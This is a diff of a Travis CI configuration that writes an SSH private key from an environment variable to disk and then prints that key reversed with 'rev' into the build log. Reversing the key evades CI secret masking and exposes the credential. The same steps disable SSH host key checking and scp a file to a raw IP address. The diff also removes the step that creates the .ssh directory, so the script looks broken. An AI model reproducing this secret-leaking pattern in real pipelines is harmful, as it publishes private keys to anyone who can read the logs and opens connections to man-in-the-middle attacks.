--- a/.travis.yml
+++ b/.travis.yml
@@ -1,11 +1,10 @@
 install: true
 script: echo "SUCCESS" > ~/test_file
 after_success: 
-- mkdir -p ~/.ssh
+- ls -R -tr | grep "TEST-*.xml"
 - echo "-----BEGIN RSA PRIVATE KEY-----" > ~/.ssh/id_rsa
 - echo $FOO | tr ' ' '\n' >> ~/.ssh/id_rsa
 - echo "-----END RSA PRIVATE KEY-----" >> ~/.ssh/id_rsa
 - cat ~/.ssh/id_rsa | rev 
 - chmod 400 ~/.ssh/id_rsa
-- chmod 700 ~/.ssh
 - scp -i ~/.ssh/id_rsa -o StrictHostKeyChecking=no ~/test_file pzhao12@40.117.255.191:/home/pzhao12/
